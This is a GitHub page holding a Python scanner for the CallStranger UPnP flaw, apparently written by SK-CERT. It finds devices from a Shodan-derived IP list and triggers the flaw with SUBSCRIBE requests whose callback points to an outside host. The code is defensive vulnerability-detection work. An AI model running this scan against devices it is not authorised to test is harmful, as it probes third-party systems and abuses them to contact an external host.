-
Notifications
You must be signed in to change notification settings - Fork 0
/
callstranger_scan.py
executable file
·144 lines (120 loc) · 4.5 KB
/
callstranger_scan.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
#!/usr/bin/env python3
## CallStranger scanner
# Usage:
# 1. install dependencies (python3, requests, urllib3) (see Installation)
# 2. create list of potentialy vulnerable hosts (one ip per line). eg.
# ```
# shodan download port1900.json "port:1900 country:sk"
# gunzip port1900.json.gz | jq -r .ip_str | sort | uniq | shuf > ips
# ```
# (optional) 3. tweak TIMEOUT and MAX_ATTEMPTS
# 4. prepare your callback web server (any http server will do)
# 5. run the scan
# ```
# ./scan.py ips "http://x.x.x.x:80/callback" | tee scan.log
# ```
# 6. collect results from httpd logs on your callback host (x.x.x.x)
#
# Output:
# - stdout - CSV of all identified eventSubURLs in following format:
# "host;eventSubURL;http-status-code;http-response-len")
# devices that responded with http status 200 are most likely vulnerable.
# `grep ';200;[^;]*$' scan.log | cut -d';' -f1 | sort | uniq`
# (tested only on small sample. might produce false positives. better check your httpd logs...)
#
# - stderr - errors and other debugging stuff :)
#
# Installation:
# ```
# apt-get install -y python3-virtualenv
# virtualenv -p python3 callstranger
# . ./callstranger/bin/activate
# pip3 install requests
# ```
# jsk @ SK-CERT, 2020-04-13
import sys, re, socket, requests, xml.etree.ElementTree, time, urllib3
def debug(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def fail(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
sys.exit(1)
#XXX: tweakables
# maximum duration of scan is SSDP_TIMEOUT * SSDP_MAX_ATTEMPTS * len(argv[1]) * SSDP_SLEEP
SSDP_TIMEOUT = 10
SSDP_MAX_ATTEMPTS = 10
SSDP_SLEEP = 0.1
# upnp client timeout for callback
UPNP_TIMEOUT = 180
# parse arguments
if len(sys.argv) != 3:
fail("usage: %s IP_LIST CALLBACK" % sys.argv[0])
UPNP_CALLBACK = sys.argv[2]
hosts = { line.strip(): {} for line in open(sys.argv[1], 'r')}
# 1. perform SSDP service discovery on all hosts
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.settimeout(SSDP_TIMEOUT)
msg = [
'M-SEARCH * HTTP/1.1',
'Host:239.255.255.250:1900',
'ST:%s' % 'upnp:rootdevice',
'Man:"ssdp:discover"',
'MX:1',
'']
for attempt in range(SSDP_MAX_ATTEMPTS):
ips_without_ssdp = list(ip for ip in hosts.keys() if 'ssdp' not in hosts[ip])
if len(ips_without_ssdp) == 0:
break
for ip in ips_without_ssdp:
debug("send SSDP discovery to %s" % ip)
s.sendto('\r\n'.join(msg).encode(), (ip, 1900))
time.sleep(SSDP_SLEEP)
while True:
try:
data, (remote, port) = s.recvfrom(32*1024)
if remote in hosts:
urls = re.findall('location:[ ]*(.*)', data.decode('utf-8'), re.IGNORECASE)
hosts[remote]['services_urls'] = set(re.sub('://([^:/]*)([:/])', '://'+remote+'\\2', url.strip()) for url in urls)
hosts[remote]['ssdp'] = data
debug("got %d service urls from %s" % (len(hosts[remote]['services_urls']), remote))
else:
debug("ssdp response from unexpected host.", remote, data)
except socket.timeout:
break
# 2. download service xml
for ip, host in hosts.items():
if 'services_urls' not in host:
continue
for url in host['services_urls']:
try:
r = requests.get(url)
except:
debug("failed to download services.xml from", url)
continue
try:
base_url = '/'.join(url.split('/')[:3])
doc = xml.etree.ElementTree.fromstring(r.text)
elements = doc.findall('.//n:eventSubURL', namespaces=dict(n='urn:schemas-upnp-org:device-1-0'))
except:
debug("failed to parse services.xml from", url)
hosts[ip]['event_sub_urls'] = set()
for el in elements:
hosts[ip]['event_sub_urls'].add(base_url + el.text)
debug("got %d eventSubURLs from %s" % (len(hosts[ip]['event_sub_urls']), url))
# 3. test each eventSubURL for callback vulnerability
headers = {
'NT': 'upnp:event',
'TIMEOUT': 'Second-%d' % UPNP_TIMEOUT,
'CALLBACK': '<%s>' % UPNP_CALLBACK,
}
http = urllib3.PoolManager()
for ip, host in hosts.items():
if 'event_sub_urls' not in host:
continue
for url in host['event_sub_urls']:
try:
resp = http.request('SUBSCRIBE', url, headers=headers)
print(';'.join(str(v) for v in [ip, url, resp.status, len(resp.data)]))
except:
print(';'.join(str(v) for v in [ip, url, "-", 0]))
# 4. collect results on callback url
# XXX: